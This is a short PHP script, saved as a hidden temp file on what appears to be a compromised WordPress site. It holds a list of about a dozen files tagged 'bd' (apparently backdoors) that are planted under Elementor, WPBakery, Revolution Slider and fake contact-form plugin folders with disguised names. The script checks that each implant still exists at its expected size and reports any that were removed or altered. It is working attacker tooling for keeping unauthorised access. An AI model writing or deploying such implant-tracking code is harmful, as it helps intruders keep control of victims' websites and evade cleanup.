File: //tmp/.ref
<?php $r = '/home/dh_443dsj/yolo.raycreative.com'; $x = ["/wp-content/plugins/contact-1766692176/includes/config-1766692176.php"=>"bd@@37944@@874",
"/wp-content/plugins/contact-1766691667/author-template-1766691667.php"=>"bd@@28225@@741",
"/wp-content/plugins/elementor/core/common/modules/event-tracker/data/categories.php"=>"bd@@259946@@925",
"/wp-content/plugins/js_composer/include/classes/vendors/plugins/woocommerce/grid.item.shortcodes.php"=>"bd@@259947@@916",
"/wp-content/plugins/elementor/assets/js/packages/editor-app-bar-ui/SQLiteStore.app.bar.ui.asset.php"=>"bd@@259948@@965",
"/wp-content/plugins/elementor/modules/promotions/admin-menu-items/interfaces/shPageRewrite.php"=>"bd@@259949@@998",
"/wp-content/plugins/elementor/modules/site-navigation/data/endpoints/homepage.posts.php"=>"bd@@259950@@1023",
"/wp-content/plugins/elementor/app/modules/kit-library/data/taxonomies/amodule.php"=>"bd@@259720@@965",
"/wp-content/plugins/elementor/assets/js/packages/editor-app-bar/editor.app.bar.asset.php"=>"bd@@259721@@902",
"/wp-content/plugins/js_composer/include/templates/params/google_fonts/xmltaghandler.php"=>"bd@@259722@@1021",
"/wp-content/plugins/revslider/admin/includes/shortcode_generator/wpbakery/hr.php"=>"bd@@259723@@853",
"/wp-content/plugins/elementor/app/modules/site-editor/module.inc.php"=>"bd@@259724@@878"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');